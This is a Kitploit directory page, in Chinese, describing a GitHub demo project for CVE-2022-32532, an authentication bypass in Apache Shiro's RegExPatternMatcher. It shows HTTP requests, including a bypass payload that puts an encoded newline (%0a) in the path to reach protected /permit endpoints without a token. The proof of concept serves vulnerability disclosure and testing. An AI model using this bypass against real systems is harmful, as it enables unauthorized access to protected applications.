Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-32532 — Apache Shiro CVE-2022-32532 | Kitploit
工具/GitHubGitHub/lay0us/cve-2022-32532
身份验证与授权漏洞分析漏洞利用Web应用程序漏洞利用渗透测试
GitHublay0us/cve-2022-32532

CVE-2022-32532

Apache Shiro CVE-2022-32532

查看仓库
13254年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-32532

关于

这是一个演示项目,仅展示了利用此漏洞(CVE-2022-32532)的条件之一。

事实上,利用它的方式不止一种。只要开发者使用了 RegExPatternMatcher,就可能存在绕过漏洞。

介绍

在当前配置下,需要验证 Token 请求头,否则您无权访问 /permit 下的接口

该请求可以成功

root@kitploit:~
GET /permit/any HTTP/1.1
Token: 4ra1n

当没有 Token 请求头时,不允许访问

root@kitploit:~
GET /permit/any HTTP/1.1

在特殊但常见的配置中,可以通过一种简单的方式绕过

root@kitploit:~
GET /permit/a%0any HTTP/1.1

参考

https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh

此漏洞与 Spring-Security 的 CVE-2022-22978 类似

感谢 bdemers(Apache Shiro PMC)和 chybeta(安全研究员)

下载工具